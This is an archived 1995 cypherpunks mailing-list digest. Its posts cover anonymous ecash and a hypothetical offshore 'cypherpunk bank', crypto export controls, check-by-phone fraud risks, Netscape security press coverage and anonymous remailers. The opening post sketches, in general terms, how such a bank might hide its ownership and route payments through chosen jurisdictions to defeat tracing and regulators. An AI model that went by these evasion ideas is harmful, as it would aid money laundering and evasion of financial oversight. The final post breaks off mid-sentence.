From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdavidm@iconz.co.nz (David Murray)
Date: Tue, 10 Oct 95 22:59:59 PDT
To: cypherpunks@toad.com
Subject: Banque des Cypherpunks
Message-ID: <pnr828410657q@iconz.co.nz>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

C'punks,

What would a cypherpunk bank (being a bank the style of which some cypherpunks
would not hate too much :-) look like? How could it be made safe to run?

One avenue of safety - shepherding the idea through SEC etc scrutiny so as to
render the venture completely legal seems to lack something of a c'punk
flavour. After all, one idea that some of us are quite taken with is that
strong crypto and the changes it brings are not only important (they are), nor
good (as Tim has pointed out - it depends where you stand) but *inevitable*.

So, how safe would a cp style bank be today?

There seem to be a number of possible pressure points: the machine, the
operators, the managers/directors, the owners, the assets, getting money out of
the system and getting money into the system.

The Machine

The easiest way to shut down an ebank is probably to unplug the machine the
software is running on and take it away. A variation of this is to cut off
net/telecomms access, or even electricity. (In the US/UK/NZ etc this would
not seem to be too difficult - lie to a judge about a bit of child porn and
you can pretty much take what you like.) Restricting ourselves to legitimate
securities/banking enforcement, however, it would seem to be enough to move
the box to some appropriate offshore site away from the major markets for
the bank's services. Obviously, there is no need to actively advertise the 
physical location of the processor...

The Operators

Even if the authorities of the target jurisdictions (US, Europe, Asia) can't
reach the operators of the machine while they are tending to it, they could,
presumably, make it difficult for those people to leave their jurisdictions
once they had entered them - by, for instance, issuing arrest warrants, or
holding trials in absentia. Again, if the physical location of the machine
is sufficiently obfuscated, this attack can be foiled.

The Managers/Directors

Assuming the bank is some kind of artificial legal entity, it will require
some other legal entity to control its actions. That controlling entity
could be themselves an artificial legal entity - for instance, a corporate
director of an offshore company.

The Owners

Assuming the bank itself is not a natural person, it will be owned by someone
(at least one list member has indicated an interest in investing in some form
of ebank). These owners could be the subject of pressure. Using the same
technology that made the ecash anonymous, the ownership of the bank could be
made similarly unknowable.

The Assets

A bank isn't going to last long if the SEC can just take its 'deposits'. 
Fortunately there are still a number of jurisdictions left where the bank's
bank account should be safe.

Getting Money out of the System

Eventually Tim is going to want to turn his Blacknet earnings into USD to
reinforce his security perimeter. How do we stop the Feds effectively
making it illegal to receive cheques from Banque des Cp? Presumably, BCp
instructs its banks to issue bank cheques, or get bank cheques from other
banks. Receiving wire transfers from Citbank may be notifiably suspicious,
but that just makes you one of millions...

Getting Money into the System

This strikes me as the most serious problem. If we differentiate between
big ticket (wholesale pharmaceutical type) and small ticket (remailer stamp
type) transactions, it might just be possible that the former could be
managed without bringing down the wrath of the authorities on the customers
(having failed to effectivley attack the bank). Essentially the idea is to
route payments through enough appropriate jurisdictions that tracing back
from the ebank to the customer is impossible (or, rather, unlikely). Sticking
a Libyan bank in the chain could help, for instance...

But small ticket transactions can't use this route. The easiest thing to do
would be to accept credit cards - but it wouldn't take much to convince Visa
and Mastercard not to let their services be used, if not turn over details
of everyone who tried to buy ecash. Cheques, TTs etc seem too cumbersome to
be marketable, and, once again, too easy to trace - at least at first glance.

The problem stems, I think, from trying to satisfy two seemingly opposed
requirements - the customer must be sure who they are paying, but the
authorities must not know the customer is paying the bank.

Any ideas?

[Another problem occurs to me. Alice's Awsome XXX CD-Rom Shoppe accepts
BCp's BlackCash[TM]. Simon from the SEC buys a CD with BlackCash. "Asian
Teenage Leather Maidens" duly arrives, and Simon arrests Alice for dealing
in unauthorised securities (and unauthorised dealing in securities etc)...]

I think I'll stop before I talk myself out of the whole thing :-)

Cheers

Dm


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMHtVEVlo3j8JHzalAQHT9wP/TV0AN7o4/yfkKw3G4SPrZWUO+LUFdDnD
a9v6OKUZZ8LrPQ/XORq3dvtOFtJ6GNiOPZkAWQQI9Rm792PcW4mdF+ppKynjgt0A
olK/wFnbBVhYwoEOXvqaC+ZwCTbaewpydEi3OEPGRoXbpDaYxQkfAj7K0dPT21sz
TjV5qM+rt+M=
=dTqF
-----END PGP SIGNATURE-----

[Palmtop News Reader - Beta Version 3]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 11 Oct 95 15:36:23 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: CoCom and Crypto Export
Message-ID: <199510112236.SAA18415@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


I just sent this to the firewalls list in reply to a message there, but I 
thought it might be of interest here too. 

-Futplex <futplex@pseudonym.com>
hmmm, haven't seen any mail from the list in a suspiciously long time....

Forwarded message:
> Subject: Re: International Encryption Protocols
> To: Firewalls@GreatCircle.COM
> Date: Wed, 11 Oct 1995
> 
> Ted Doty writes:
> > Certainly the signatory countries to the CoCom treaty all enforce similar
> > export controls to those enforced by the USA.  Therefore, do not go looking
> > to purchase cryptography in the UK for use outside the UK.
> 
> I think this is misleading. CoCom, the Coordinating Committee for
> Multilateral Export Controls, amounted to a non-proliferation pact to
> prevent the spread of supercomputers and other hot potatoes beyond the
> club of countries to untrusted (non-CoCom) countries. As far as I can tell it
> did not erect export barriers _between member countries_, except perhaps some
> ordinary red tape. 
> 
> Before it officially dissolved in early 1994, CoCom included, among others,
> all of the G7 plus a healthy chunk of Western Europe: Australia, Belgium, 
> Canada, Denmark, France, Germany, Greece, Italy, Japan, Luxembourg, 
> the Netherlands, Norway, Portugal, Spain, Turkey, the U.K., and the U.S.
> According to http://www.chemie.fu-berlin.de/adressen/org-fact.html, Austria, 
> Finland, Ireland, South Korea, New Zealand, Singapore, Sweden, and Switzerland
> were voluntarily cooperating with the export restrictions.
> 
> As far as CoCom was concerned, you could generally sell crypto from Britain
> to most of the net. This is a far cry from the position of the U.S. ITAR,
> which prohibits the export of strong confidentiality-protecting crypto to the
> U.K., for example.
> 
> Most of the other CoCom signatories do _not_ enforce export controls similar
> to the U.S. ones.   
> 
> [...]
> > Note: the treaty has expired, but the signatory countries seem to still be
> > willing to follow it.  Nobody really wants to see strong crypto widely
> > deployed.
> 
> Make that "No government really wants...." and I'll agree with you.
> 
> BTW, ftp://ftp.eff.org/pub/CAF/law/software-export-law contains an 
> interesting, detailed memo dated 95/03/06, from a California law firm, giving
> an "Update on Current Status of U.S. Export Administration Regulations on 
> Software Exports".
> 
> -Futplex <futplex@pseudonym.com>
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Wed, 11 Oct 95 18:56:23 PDT
To: Cypherpunks <cypherpunks@toad.com>
Subject: Final Roster/Reminder -- Bionomics Conference (fwd)
Message-ID: <Pine.SUN.3.91.951011183642.16286B-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Here's a sign of the times>


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---------- Forwarded message ----------
Date: 11 Oct 95 14:38:02 
. . .
Subject: Final Roster/Reminder -- Bionomics Conference

Dear Friends,

With a record number of 35 speakers and panelists (whew!), the program for the 
3rd Annual Bionomics Conference has been finalized.  Since our brochures were 
printed, we've added a number of interesting and thought-provoking individuals, 
including

o Lew Perelman, author of "Hyperlearning"
o Andrew Basile, author of "The SPA's Guide to Online Law"
o Morley Winograd, author of "Taking Control:  Politics in the Information Age"
o Frank Gregorsky, former chief of staff to Cong. Newt Gingrich
o Jim Griffin, Director of Technology at Geffen Records
o Don Lavoie, Director, Program on Social & Organizational Learning, George 
Mason University
o Irwin Glenn, Senior Systems Engineer, Netscape Communications
o Pat McKim, Managing Partner, Practical Strategies 
o Cindy Cooke, Director, Democratic Leadership Council of CA
o Dennis Miller, Associate Professor, Baldwin-Wallace College
. . .
What's more, for the truly tech-savvy, you can now pay for your conference 
attendance with Cybercash.  Just check our web site (www.bionomics.org).
. . .           ^^^^^^^^^




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@atlas.ex.ac.uk
Date: Wed, 11 Oct 95 10:51:56 PDT
To: sdavidm@iconz.co.nz (David Murray)
Subject: Re: Banque des Cypherpunks
In-Reply-To: <pnr828410657q@iconz.co.nz>
Message-ID: <28715.9510111748@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

David Murray <sdavidm@iconz.co.nz> writes:
> One avenue of safety - shepherding the idea through SEC etc scrutiny
> so as to render the venture completely legal seems to lack something
> of a c'punk flavour. After all, one idea that some of us are quite
> taken with is that strong crypto and the changes it brings are not
> only important (they are), nor good (as Tim has pointed out - it
> depends where you stand) but *inevitable*.
>
> So, how safe would a cp style bank be today?
>
> [feasibility analysis of blacknet style payment system]

If you haven't, you should read Doug Barnes <cman@communities.com>
recent postings on the current state of money laundering regulations.
Chilling stuff.  You can bet they are not going to like the payment
system you described, it's it's methods of transfering funds to and
from US bank accounts would be open to many of the anti-money
laundering attacks.

It would put a lot of strain on the remailer nets to have the likes of
FinCen, FBI, CIA, NSA etc. after them.  It is the legal impliciations
which are the problem, if they don't like what you are doing, and can
hold that it is illegal, they will come after you with excessive
force.

Even it you could get away with it, a purely anarchistic system has
the disadvantage of lack of take up: if no one is accepting your
e-cash, you can't buy things with it.  It could be made illegal for
people to accept your e-cash, at this point only people acting
anonymously will be using it.  

I think a possible approach is to work in two stages: to first work
towards wide use of ecash, as privacy preserving as feasible with
government imposed restrictions, and then in the future work on
improving the level of privacy.

The two stage approach I think is more likely to succeed because while
there is no payment infrastructure, the hard-line blacknet style
operations run counter to the aim of speeding the uptake of ecash.

It seems to me that payment systems that escape jurisdictions by being
in cyberspace protected by strong crypto, whilst perhaps inevitable
long term, are still some way off.

I think it is useful to explore what could be achieved by getting
something less abitious working first.

I like the distributed anarchic approach too, but lets first find
peoples opinions on what is possible within the system, and see if
anything useful would be possible with these constraints.  

I would like to hear views on whether the best that can be achieved
with such constraints would be a step in the direction of a more
desirable system (with better privacy guarantees), or whether it would
instead be detrimental to the cause, say perhaps by contributing to
getting a non-privacy preserving scheme immovably fixed as a standard.


There are several approaches to ecash systems that I am aware of:

1. no anonymity - most current systems

2. "trust me" the schemes which claim anonymity, but in reality rely
   on your trust in the bank. eg Mondex

3. clipper-cash (Jakobsson) here you get to trust a (supposedly
   independant) third party

	http://www-cse.ucsd.edu/users/markus/
	http://www-cse.ucsd.edu/users/markus/revoke.ps

4. blind signatures (Chaum, Brands)

	http://www.digicash.com/
	http://www.digicash.com/publish/pu_sc.html

5. or agnostic server (Doug's paper)
   (blinding as well, just avoiding Chaum's patents)

	http://www.communities.com/paper/agnostic.html

6. anarchy - remailer net, blacknet type operation


I would discount 1 & 2 as outright undesirable, and already available
anyway.  6 would cause the regulators to throw a fit.

Of the remainder 3, 4 & 5, I think the most likely to be acceptable to
regulators is 4: clipper-cash.  Next come 4 & 5.  Chaum's blinding,
and Doug's agnostically blinding proposals.


What do people think of clipper-cash?

Basically it sets of a scheme where you have an ombudsman who is
supposed to be acting on the consumers behalf.  Revoking privacy
requires the cooperation of both the bank and the ombudsman - the bank
on it's own can't strip your privacy.

Down side: to get such a scheme past regulators the ombudsman would
probably end up being a government body, or one beholden to
government, such as banks are with all the current banking regs, re
Doug's last two posts on the subject.

The problem with clipper-cash see is that it is just as the name
implies: private until you are investigated, or until the regulators
decide to go on a fishing spree.  But better than no anonymity.

Technologically it would be possible to have multiple ombudsmen, or
even have the recovery key be secret share split amongst ecash users
in such a way that some chosen percentage of agreement would be
required before cash could be traced, or revoked (made worthless).

I would presume that the more ombudsmen there are, and the less
amenable they are to government pressures, the less likely the payment
scheme would be to be acceptable to the banking regulators.

Does clipper cash satisfy any cypherpunk goals?  Or is it the ecash
equivalent of the hated clipper, and clipper II initiatives?

A blinding agnostic or openly blinding signature based server would
obviously be preferable, but could you get such a system approved by
the regulators?

These are just questions, to see what people think are the optimal
configurations from a cypherpunks perspective, and how close to these
ideals a payment system could be and still get past the regulators.

Adam

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAwUBMHwDaSnIuJ1VakpnAQHS9wQAmVqEtZI4gNLWtory4adCvkZ1hKDYleXJ
i2SM/HzvqreyVGyPyYEVWqwNasOYoUvUH/lJBt0DNjnAk1xzU2xFcjKxjjA9sOH8
tUxPbAPBNK9UJIMqMHUPCz33KDd0KYeHDJXYvW1Or+JUxRKQD065hBZZLIJqf3+K
DXcMlD4qifU=
=01vA
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Barman <scott@Disclosure.COM>
Date: Wed, 11 Oct 95 15:49:31 PDT
To: nobody@connect.com.au
Subject: Re: BoS: Re: Netscape & Fortessa
In-Reply-To: <199510111620.RAA25682@utopia.hacktic.nl>
Message-ID: <Pine.SUN.3.91.951011184837.29924D-100000@di2>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 11 Oct 1995, Anonymous wrote:

> 
> Netscape to Offer Fortezza Cryptographic Capability for
> Its Software Products
> 
> Underscores Company's Commitment to US Government Market

<... snip ...>
 
> Support for Fortezza has been added to Netscape's Secure
> Sockets Layer (SSL) open protocol.  SSL provides a
                      ^^^^

I wonder how open a protocol is when one company proposes it, changes it at
will, and makes what looks like a token effort for acceptance for peer review
through mechanisms currently in place?

scott barman
--
scott barman                  DISCLAIMER: I speak to anyone who will listen,
scott@disclosure.com                      and I speak only for myself.
barman@ix.netcom.com
  "I don't know if security explains why the Win95 support Web servers run BSDI
   2.0--an Intel-based Unix--rather than Windows NT, which Microsoft insists is
   the ideal Web software solution.  Does Redmond know something we don't know?"
             -Robert X. Cringely, INFORWORLD, 9/11/95





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 11 Oct 95 15:51:43 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: CancelMoose = William Nagengast?
Message-ID: <199510112251.SAA32456@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Mark writes:
> #define paranoia on
> 
> Just ask your local TLA that has traffic monitors on the up and down links of
> all the remailers so they can track a piece of email from sender to recipient.
> They will take the (relatively small) logs of the hour and pump out a name
> for you.
> 
> #define paranoia off
> 
> :)

That's one of the principal advantages of Mixmaster over the earlier 
generation anonymous remailers. Approaching a Chaumian digital mix more
closely than previous implementations, it uses only encrypted standard-sized
packets in transit. This protocol should make it hard or impossible to 
narrow the list down to anything like a single name, depending on ambient
traffic conditions.

-Futplex <futplex@pseudonym.com>
"Our encryption doesn't use an encryption algorithm" -Elementrix



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Wed, 11 Oct 95 18:55:19 PDT
To: cypherpunks@toad.com
Subject: Check by phone (revisited)
Message-ID: <v02120d07aca227ad455e@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



There are a variety of these new "check by phone" operations
advertising on the Internet; I decided to check some of them
out this afternoon.

Most of them seem to use the same breathless prose immortalized
in "Make Money Fast", along with generous use of the Netscape
"blink" attribute, which immediately sent alarm bells ringing,
especially when coupled with referral programs that border on
a pyramid scheme. Furthermore, it's clear that these operations
are highly vulnerable to fraud and abuse, as was mentioned in a
thread on the list a few weeks back.

Quoting from http://www.pixi.com/morgan_group/checks/by_phone.html:

---------
TELEPHONE CHECKS (PAPER DRAFTS) ARE COMPLETELY LEGAL!

Paper drafts are established as a legal method of payment as provided
in the Uniform Commercial Code, Title 1, Section 1-201 [39] and Title 3,
Sections 3-104, 3-401, and 3-403; Code of Federal Regulations, Title 12
Chapter II, Part 210; and Regulation J, Federal Reserve Bank, Part 2,
Sections 4A-201 to 4A-212. Only verbal agreement is required for
authorization. Also see Romani v Harris, 255 Md 389.
---------

Any lawyers feel like checking this stuff out? (I've got
the UCC at home, but not the rest of the materials.)

When I called the phone number given at:
http://www.Village.com/business/enterprise, I got a guy who
was obviously at home, "watching the ball game"; he was quite
pushy and focused on the system of "referrals" for people who
sign up. Among other things, he had never heard of an ACH debit
and was therefore unable to compare the conflict resolution
processes for the two methods. (ACH debits are what your health
club uses to deduct fees from your checking account each month --
the transactions are reversible solely on the customer's say-so.)

The folks at http://www.redichek.com/redichek/redifaq.htm seem
a bit more professional. They admit in e-mail that there is a security
problem here (no kidding), especially wrt sending routing and
account information over the Internet. I enclose our correspondence
at the end of this posting, for your reading enjoyment.

It seems plain from the nature of the folks who are offering these
check printing services that they are not regulated or licensed.
Also, it seems that these services are really just preparing the
drafts, any liability for submitting bogus drafts rests on the merchant
into whose account the drafts are deposited.

Question: has anyone seen more legitimate folks offering this type
of service? Also, it seems that for the fees that these folks are
charging, it would be worth it for a merchant to do this in-house.
When this topic came up before, I recall people mentioning sources
of magnetic ink and check paper; is this stuff really widely available?

Another puzzling factor is that all the services seem to base the
fees on the amount of the transaction, when, as near as I can tell,
the check printer has no exposure, and costs are in no way proportional
to transaction size (basically they're collecting data and running
a laser printer.) Proably due to their positioning themselves wrt
credit card companies.

Joe-Bob sez: Check it out.

=========================================================================
Date: Wed, 11 Oct 95 18:13:57 -0600
X-Sender: msumsion@mail.redi-check.com
Mime-Version: 1.0
To: cman@communities.com (Douglas Barnes)
From: msumsion@optical.fiber.net (Michael Sumsion)
Subject: Re: Legal basis

Douglas,

Thanks for the inquiry.  Before I answer your questions, I would like to
make you aware that we are in the process of building a completely new,
completely secure system using this same check-draft service.  It will be
arriving within the next couple of weeks.  This new system will allow online
customers to make purchases, using their checking account, without the need
to transmit their account information over the Internet.

On to your questions:
>
>Hi, our company may be a potential customer of your service,
>but I have questions about the legalities involved in printing
>drafts on people's accounts. In particular, this system seems
>especially vulnerable to fraud. I just spoke with our banker,
>who had not heard of these services, and was quite concerned.

Many bankers have not heard of the system, although it has been in use now
for over 3 years.  We get calls from bankers on a regular basis who are
curious about the service.  After explaining it to them, they are generally
very supportive.  As far as the legalities, it is perfectly legal to print a
draft, drawn on a customer's account, with the authorization of the
customer.  In fact, the legal basis for this is printed on the bottom of
each of our drafts.

>For instance, wouldn't it be possible for any recipient of a
>check from someone to copy down the routing information and
>account number, and then use that to defraud the account holder
>and the merchant?

Yes, this is possible.  We have never run into this situation, however.  We
are not stating that this system is any more secure (with the current
system) than credit cards.  What we WILL say is that this system is as safe
as walking into any store and handing the clerk one of your checks.  (The
new system will eliminate the need to transmit this information.)

>Also, I'm curious where the liability rests in the event that
>a charge is disputed -- that is, the customer claims that they
>didn't authorize the transaction. How readily are the charges
>reversed? I'm familiar with ACH debits, which are extremely
>easy for customers to reverse; how does this system compare with
>ACH debits?

Since there is no standard or regulation regarding this in the banking
industry, this differs from bank to bank.  Some banks will allow you to go
back as far as two years to dispute a check.  Others will only go back 30-60
days from the date of receipt.

I hope that I've been able to answer completely.  If you would like to speak
with someone about specific processes, please give Allen a call at 801.298.1212.

Thanks,

Michael Sumsion

    _/_/_/ _/_/_/ _/_/   _/      _/_/_/ _/  _/ _/_/_/ _/_/_/ _/  _/ TM
   _/  _/ _/     _/  _/ _/      _/     _/  _/ _/     _/     _/ _/
  _/_/   _/_/   _/  _/ _/ _/_/ _/     _/_/_/ _/_/   _/     _/_/
 _/ _/  _/     _/  _/ _/      _/     _/  _/ _/     _/     _/ _/
_/  _/ _/_/_/ _/_/   _/      _/_/_/ _/  _/ _/_/_/ _/_/_/ _/  _/

 Internet Commerce Solutions - (800) 607-2001 Fax (801) 298-9789
email: msumsion@redi-check.com http://www.redi-check.com/redi-check
Referral Program: http://www.redi-check.com/redi-check/referral.htm
======================================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Berger <dvberger@eit.COM>
Date: Wed, 11 Oct 95 18:51:36 PDT
To: Paul A Gauthier <gauthier@CS.Berkeley.EDU>
Subject: Re: NYT on Internet Flaws
Message-ID: <199510120159.SAA27558@viper.eit.com>
MIME-Version: 1.0
Content-Type: text/plain


[stuff deleted]

>People seem to miss that the NFS hack was only an _example_ of a powerful
>way to silently destroy the integrity of an executable. Spoofing the
>insecure FTP session they used to retrieve it works. Sending them a random
>trojan horse works. The point was not that NFS is insecure. It was that
>unless you can authenticate your executables as being trustworthy NOTHING
>ELSE MATTERS.

No I don't think the community missed the point.  While both NFS and FTP are
equally weak in the way you point out, I think you should have used FTP as
your main example because if we presume that the file server where the
binary lives is reasonably trustworthy (like the guys at Netscape haven't
inserted a trojan horse into their own binary and placed it up for FTP) then
the way the file will propogate throughout the net is FTP and not NFS.

Nonwithstanding, the NY Times writer took an otherwise reasonable point and
blew it up into a "War of the Worlds" style article.  I'd make sure he
writes a decent article before quoting me in it.

David  (wondering whose stock fell because of this page one-er)
===========================================================================
David A. Berger
Software Engineer/Internet Product Development
Enterprise Integration Technologies|800 El Camino Real|Menlo Park, CA 94025
dvberger@eit.com   http://www.eit.com/~dvberger/ (415) 617-8792
===========================================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Wed, 11 Oct 95 16:27:37 PDT
To: Chris Claborne <Chris.Claborne@SanDiegoCA.ATTGIS.com>
Subject: Re: SAIC bought InterNic, but who is SAIC? A spook contractor!
In-Reply-To: <199510111853.OAA26654@ncrhub5.attgis.com>
Message-ID: <Pine.SV4.3.91.951011192135.17718F-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


I used to work for SAIC. It's a legitimate beltway-bandito contractor. To 
call it a cover op is sort of missing a point. The government hardly ever 
does _anything_ itself (as, say, percentage of budget). Contractors are 
the ones who do the dirty work in the trenches.

SAIC is very widely dispersed. Each field office is responsible for 
getting it's own contracts.  Hardly any revenue flows down from HQ to the 
field offices. My boss used to say, "this place is like a McDonalds".

AS we speak, the US Navy is busy dis-establishing its Shore 
Establishment. Cost savings. The same people will do the same jobs - they 
will have merely been hired by contractors.

Alan Horowitz
alanh@infi.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 11 Oct 95 17:18:53 PDT
To: cypherpunks@toad.com
Subject: Re: NYT on Internet Flaws
Message-ID: <199510120018.UAA16359@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   There's a strange anxiety in Markoff's story, as though it
   was planted on page one to exaggerate a threat to cyber law
   and order. Reminds that his articles on Kevin were also
   melodramatic, himself a player, privileged to join the
   hunt. Maybe this is ambient hot material for his burbling
   potboiler on Shimomura and Mitnick, honing an author's
   creative edge, and artistic license, over that, ahem, of
   the tranquil and capaciously befriended journalist's, pissed 

   that privileged news files were hacked, are hackable.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 11 Oct 95 12:30:47 PDT
To: cypherpunks@toad.com
Subject: Pointer to 10/9/95 EE Times Article
Message-ID: <199510111930.UAA29409@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com, llange@eet.cmp.com

Front Page:
`Cypherpunks' asked to breach Netscape, Microsoft security
Desperately seeking hackers

Quotes from Sidebar (How the `Cypherpunks' mailing list works):

"When The New York Times announced a security flaw in Netscape
 Communications Corp's World Wide Web browser software a few weeks
 ago, the `Cypherpunks' hit the big time."

This may be true.  Companies are now asking for their products
to be brutalized by the Cypherpunks' to help ensure security!
This could not be said even a few mere weeks ago.

"According to the group's moderator, who prefers to remain anonymous,
 `The most important means to the defense of privacy is encryption.
 Cypherpunks are therefore devoted to cryptography.  They wish to learn
 about it, to teach it and to implement it.'"

Ok, since when is the Cypherpunk's mailing list moderated?

It is apparent that the author, Larry Lange, has never studied the
list closely or he would know how amusing this sounds...

(Geez, if he had ever read one of Tim May's posts on the subject... :-)

Oh well, at least, I was amused.

Regards,
Loren

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMHwRFv8de8m5izJJAQEzWgP+LCPtBBH+hz0yqOG2MfduNyGK0kM6gHfN
H/ZRZ11z2CExCZiJxRma6MhR/nRmgSePxGWMq/DfbUziUsuNwuJwN/PEEJtAXWTa
dJ3FEhUaZbVlhBJK5Um1M0SeZPqiLCQH9K0DJNE0FevrJed/3MAft+owYTk2NQ+H
oXDwXtFrTbw=
=UGHU
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 11 Oct 95 20:36:43 PDT
To: cypherpunks@toad.com
Subject: Re: NYT on Internet Flaws
In-Reply-To: <v02120d04aca21d2bcd71@[199.2.22.120]>
Message-ID: <307C8C5C.4F34@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Douglas Barnes wrote:
> It is profoundly irritating to find this splashed on the
> front page of the NYT, contributing to the FUD that
> largely benefits luddites like First Virtual and
> those, like MS$, pushing for a return to proprietary networks.
> (One quote from FV marketing director Pierre Wolfe at the ML
> conference I recently attended, "The Internet may end up
> as a ghetto, where people are afraid to engage in commercial
> activity.")

  It is a fact of life now that there are many journalists
lurking on cypherpunks, and other places on the net.  I have
been directly contacted by three reporters just in the past
week.  Our PR department tells me that cypherpunks, and my
name, are routinely mentioned by reporters these days.  I've
seen my postings to this list quoted without my prior knowlege
in at least one news article.

  I wish that folks sending to this list would realize this
new world exists, as much as it sucks, and spend a bit more time
double checking before posting anything alarmist.  In particular,
there have been several recent false alarms regarding netscape
security sent to this list and others.  While I don't want to sweep
real security holes under the rug, I think it hurts both cypherpunk
and netscape interests for false claims to be coming out of this
list.  

  Just to make things clear, I'm not an official spokesperson
for Netscape and anything sent to this list is my personal opinion.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rkw@dataplex.net (Richard Wackerbarth)
Date: Wed, 11 Oct 95 18:38:38 PDT
To: Nelson Minar <nelson@santafe.edu>
Subject: Re: anonymous web pages?
Message-ID: <v02130500aca22166f237@[199.183.109.242]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:18 PM 10/11/95, Nelson Minar wrote:
>The hard part would be finding a site that would be willing to serve
>anonymous pages. I don't understand the politics at various sites that
>allow anonymous remailers: maybe this isn't much harder?

Yes, it is "much harder". Unless the site had a cache of all the pages that
it was willing to source (the usual case), traffic analysis could easily be
applied to determine the sources for pages because, unlike mail which is
"store and forward", web pages are provided on a realtime connection.

----
Richard Wackerbarth
rkw@dataplex.net






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 11 Oct 95 20:52:56 PDT
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: NYT on Internet Flaws
In-Reply-To: <307C8C5C.4F34@netscape.com>
Message-ID: <199510120347.UAA27336@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


>   I wish that folks sending to this list would realize this
> new world exists, as much as it sucks, and spend a bit more time
> double checking before posting anything alarmist.  In particular,
> there have been several recent false alarms regarding netscape
> security sent to this list and others.  While I don't want to sweep
> real security holes under the rug, I think it hurts both cypherpunk
> and netscape interests for false claims to be coming out of this
> list.  

	I completely agree that the reporters on this list make things
very difficult and people do need to be very careful about posting
things which will get misinterpreated by reporters.. but--

	This list is -not- an "announcement" list. If I see a
potential bug, I want other cypherpunks to tell me whether I am onto
something or not, so I would post. If some idiot reporter takes that
and writes an article saying "XXX has a hole" that is -EXTREMELY BAD
REPORTING-.
	I understand though, that we can't control what the reporters
say and how they interpret what we say. It is very important to word
your posts carefully such that when you post a bug a reporter won't
think that they should write an article on it until it is verified.
	It's very sad, though, that we have to be very careful about
what we post now because of the media attention. I would prefer if the
list could just be a forum where we can discuss things, but that is
not the case.

> 
>   Just to make things clear, I'm not an official spokesperson
> for Netscape and anything sent to this list is my personal opinion.
> 

	As if that is going to help when a reporter sees your
post. "Jeff Weinstein, Electronic Munitions Specialist at Netscape,
said, 'XXXX'" -- doesn't put you down as "spokesperson for netscape",
and doesn't contain any factual errors, but is damn misleading and
makes it sound like you are speaking for Netscape... I guess I'm
rather lucky being in charge of a sole proprietorship-- there isn't
very much difference between me speaking for myself and speaking for
my business. (There are some differences, yes, but very small.)

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Wed, 11 Oct 95 12:49:24 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
Message-ID: <9510111948.AA00815@elysion.eiss.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


I was busy in the last days and didn't keep track of the certificate
discussion. I just read most of the discussion all at once. 

- There was some discussion about the bindings between the key and the
  real world attributes of the key owner.

  Under normal circumstances communication never happens without an
  originator. If the originator uses some kind of security feature, he
  normally doesn't do it just for fun. He uses it as a tool to give
  the communication certain properties.

  Authenticity and confidentiality don't make sense without knowing
  anything about the key owners. There is no use in having a signature
  as long as you don't know anything about the signator. And there is
  no use in encrypting messages as long as you don't know anything
  about the receiver. 

  A digital signature is only the way to say who wrote the
